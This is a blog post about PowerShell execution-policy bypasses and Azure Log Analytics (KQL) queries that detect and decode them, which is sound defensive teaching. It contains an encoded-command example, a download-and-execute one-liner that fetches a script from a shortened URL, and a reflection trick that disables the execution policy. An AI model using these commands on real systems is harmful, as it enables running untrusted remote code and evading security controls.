Bypass Security just to be caught by Log Analytics

Hello world

Recently using the Log Analytics, I have encountered a question by my client about the Log Analytics and ways to use it in order to find security anomaly.

One example, suppose I want to find a PowerShell script running on one of my servers by a company that is doing a penetration test, I will show you how he is running his script without the use of your Admin rights and at the same time, I will show you that what’s his doing can be monitored.

First on his side – Running PowerShell

When you run PowerShell script you need elevated permissions to run script blocks. its the execution policy by Microsoft

How can I bypass execution policy? As I found out it’s very easy (Too easy)

Here are some examples that work:

  1. The most interesting – using EncodeCommand

    use Unicode/base64 encoding and run the Powershell with -EncodedCommand

    Example:

 $command = “Write-Host ‘This is a Bypass'”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand

If you have the code already encoded then just run it on any computer like this:

powershell.exe -enc VwByAGkAdABlAC0ASABvAHMAdAAgACcAVABoAGkAcwAgAGkAcwAgAGEAIABCAHkAcABhAHMAcwAnAA==

Isn’t it cool? In Log Analytics I will show you later how you can trace the attack and even to see the commands.

2. Get the script from the web

What about getting a script premade on the web and then just run it on your server

powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://bit.ly/1kCgbiQ’)”

3. Disable Execution Policy

How about disabling the watchdog using no permissions at all?

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield(“_context”,”nonpublic,instance”).getvalue( $executioncontext)).gettype().getfield(“_authorizationManager”,”nonpublic,instance”).setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager “Microsoft.PowerShell”))} Disable-ExecutionPolicy .myscript.ps1

 

Having Fun?

Now to Log Analytics and the way to catch this unwanted activity

In Log Analytics you collect data and query it, Right? PowerShell is a process, So what about this process activity?

The next query by Microsoft will find PowerShell processes that are abnormal and havent been run in the last 30 days. So to find me running powershell on a server was very easy:

The query:

let T = SecurityEvent

| where TimeGenerated >= ago(30d)

| extend Date = startofday(TimeGenerated)

| extend Process = ProcessName

| where Process contains
“powershell”

| project Date, Process, Computer, Account

| summarize
count() by Date, Process, Computer, Account

| sort
by count_ desc nulls last;

T

| evaluate activity_counts_metrics(Process, Date, startofday(ago(30d)), startofday(now()), 1d, Process, Computer, Account)

| extend WeekDate = startofweek(Date)

| project WeekDate, Date, Process, PotentialAnomalyCount = new_dcount, Account, Computer

| join kind= inner

(

T

| evaluate activity_engagement(Process, Date, startofday(ago(30d)), startofday(now()),1d, 7d)

| extend WeekDate = startofweek(Date)

| project WeekDate, Date, Distribution1day = dcount_activities_inner, Distribution7days = dcount_activities_outer, Ratio = activity_ratio*100

)

on WeekDate, Date

| where PotentialAnomalyCount == 1
and Ratio == 100

| project WeekDate, Date, Process, Account, Computer , PotentialAnomalyCount, Distribution1day, Distribution7days, Ratio

| render barchart kind=stacked

This query is useful for finding any anomaly process in Log Analytics, just change the query a bit to fit your needs. For example, try to find RDPClip.exe to find users that copy information using RDP.

Great, but I now see only that process was running, what about the script body?

The next query will decode the script body in the command and will show you the true nature of the attacker.

SecurityEvent

| where TimeGenerated >= todatetime(‘2018-06-03’) //#—-change the dates—-#

| where TimeGenerated <= todatetime(‘2018-06-04’) //#—-change the dates—-#

| where Process contains
“powershell.exe”
and CommandLine contains
” -enc”

| where Computer contains
“hq-sccm”

|extend b64 = extract(“[A-Za-z0-9|+|=|/]{30,}”, 0,CommandLine)

|extend utf8_decode=base64_decodestring(b64)

|extend decodescript = replace (\x00″,“”, utf8_decode)

| summarize
by Computer, Account, decodescript, CommandLine

Crazy stuff!!!!!!!!

One Comment

Add a Comment

Your email address will not be published. Required fields are marked *